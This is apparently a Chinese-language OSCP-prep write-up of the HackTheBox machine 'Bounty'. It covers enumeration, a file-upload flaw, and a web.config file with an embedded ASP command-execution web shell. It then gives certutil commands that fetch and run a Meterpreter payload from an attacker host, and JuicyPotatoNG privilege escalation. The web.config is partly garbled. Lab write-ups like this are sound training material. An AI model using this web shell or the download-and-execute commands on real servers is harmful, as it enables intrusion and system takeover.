OSCP备考_0x45_HackThBox靶机_Windows_ bounty

Ethan医生2个月前 (07-11)靶场74

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227 (扫描TCP)

gobuster dir -u http://10.129.246.227 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,html,asp,aspx

http://10.129.246.227//transfer.aspx

都上传不了不管是aspx或txt,上google查询看看

Google搜索“IIS7.5 rce upload”,测试也发现config后缀未进行限制。

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c

0x01 漏洞利用

web.config文件

<?xml version="1.0" encoding="UTF-8"?>

<system.webServer>

</handlers>

</fileExtensions>

</hiddenSegments>

</requestFiltering>

</security>

</system.webServer>

</configuration>

<!--

<% Response.write("-"&"->")%>

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

Dim objShell, objCmdExec

Set objShell = CreateObject("WScript.Shell")

Set objCmdExec = objshell.exec(thecommand)

getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

<BODY>

</FORM>

<PRE>

<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>

<%Response.Write(Request.ServerVariables("server_name"))%>

<p>

<b>The server's port:</b>

<%Response.Write(Request.ServerVariables("server_port"))%>

</p>

<p>

<b>The server's software:</b>

<%Response.Write(Request.ServerVariables("server_software"))%>

</p>

<p>

<b>The server's software:</b>

<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>

<% szCMD = request("cmd")

thisDir = getCommandOutput("cmd /c" & szCMD)

Response.Write(thisDir)%>

</p>

<br>

</BODY>

<%Response.write("<!-"&"-") %>

-->

访问即可执行命令

使用MSF生成EXE上传

certutil -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe C:\users\public\shell.exe && C:\users\public\shell.exe

提权操作

certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_6666.exe c:\users\public\priv.exe

JuicyPotatoNG.exe -l 6667 -p c:\Users\Public\priv.exe -t * -c {2b72133b-3f5b-4602-8952-803546ce3344}

使用potato去提权

标签: OSCP

返回列表

上一篇：OSCP备考_0x44_HackThBox靶机_Windows_ Silo

下一篇：OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192....

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.16...

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

EthanDoctor